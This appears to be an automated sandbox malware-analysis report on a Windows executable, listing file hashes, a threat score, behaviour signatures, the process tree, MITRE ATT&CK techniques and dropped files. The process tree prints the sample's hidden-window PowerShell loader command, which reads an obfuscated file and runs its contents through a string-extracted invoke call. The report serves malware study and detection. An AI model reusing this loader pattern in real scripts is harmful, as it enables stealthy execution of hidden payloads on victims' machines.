Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-07-2024 01:26

General

  • Target

    705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5.exe

  • Size

    892KB

  • MD5

    3fb7cb8d7fd9efd2bc0cae35eb42c4fe

  • SHA1

    ce06ab538757edb9b1d4cce656006da0d3795bb1

  • SHA256

    705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5

  • SHA512

    97bbe6ba4c9cd15466cce57a762b537df55224329a354f119c7ea1af9f554888ba7c477027c83dc62b39b9d74d4ac11fb97fa206eea86c24a515a2f7a399a694

  • SSDEEP

    24576:JOreqxsYYU8rG98siSVrcQ8EO0fG5vq7He:JOCgLY69PRxfyq7+

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5.exe
    "C:\Users\Admin\AppData\Local\Temp\705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1820
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\Admin\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4716
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 2412
        3⤵
        • Program crash
        PID:1640
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4716 -ip 4716
    1⤵
      PID:228

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsntrcu1.ds5.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28
      Filesize

      71KB

      MD5

      a722a8ee65ce2bf5d2fbd7450d8fe960

      SHA1

      2992f4b10c0e3d771862c5204b9b304ec2e50634

      SHA256

      feb62e067d0cd459bc5c93ac7dcb76062257d26d8fb47e9b9e9f9d94c6706ae3

      SHA512

      0052efd489bba988c6147bfcc5acb6fccd81ff5a54f9b75c98dd69426c5d1a99513d89f17942d6606cb8786515ff3a35c7c862b7db8f3a12b1ecba63a9df8db9

    • memory/4716-13-0x0000000073990000-0x0000000074140000-memory.dmp
      Filesize

      7.7MB

    • memory/4716-28-0x0000000006680000-0x00000000066CC000-memory.dmp
      Filesize

      304KB

    • memory/4716-9-0x000000007399E000-0x000000007399F000-memory.dmp
      Filesize

      4KB

    • memory/4716-14-0x00000000051B0000-0x00000000051D2000-memory.dmp
      Filesize

      136KB

    • memory/4716-15-0x0000000005A90000-0x0000000005AF6000-memory.dmp
      Filesize

      408KB

    • memory/4716-18-0x0000000005B00000-0x0000000005B66000-memory.dmp
      Filesize

      408KB

    • memory/4716-11-0x0000000005300000-0x0000000005928000-memory.dmp
      Filesize

      6.2MB

    • memory/4716-26-0x0000000005C70000-0x0000000005FC4000-memory.dmp
      Filesize

      3.3MB

    • memory/4716-27-0x0000000006130000-0x000000000614E000-memory.dmp
      Filesize

      120KB

    • memory/4716-12-0x0000000073990000-0x0000000074140000-memory.dmp
      Filesize

      7.7MB

    • memory/4716-29-0x0000000007340000-0x00000000073D6000-memory.dmp
      Filesize

      600KB

    • memory/4716-30-0x0000000006600000-0x000000000661A000-memory.dmp
      Filesize

      104KB

    • memory/4716-31-0x0000000006650000-0x0000000006672000-memory.dmp
      Filesize

      136KB

    • memory/4716-32-0x0000000007990000-0x0000000007F34000-memory.dmp
      Filesize

      5.6MB

    • memory/4716-10-0x0000000002B50000-0x0000000002B86000-memory.dmp
      Filesize

      216KB

    • memory/4716-34-0x00000000085C0000-0x0000000008C3A000-memory.dmp
      Filesize

      6.5MB

    • memory/4716-36-0x0000000073990000-0x0000000074140000-memory.dmp
      Filesize

      7.7MB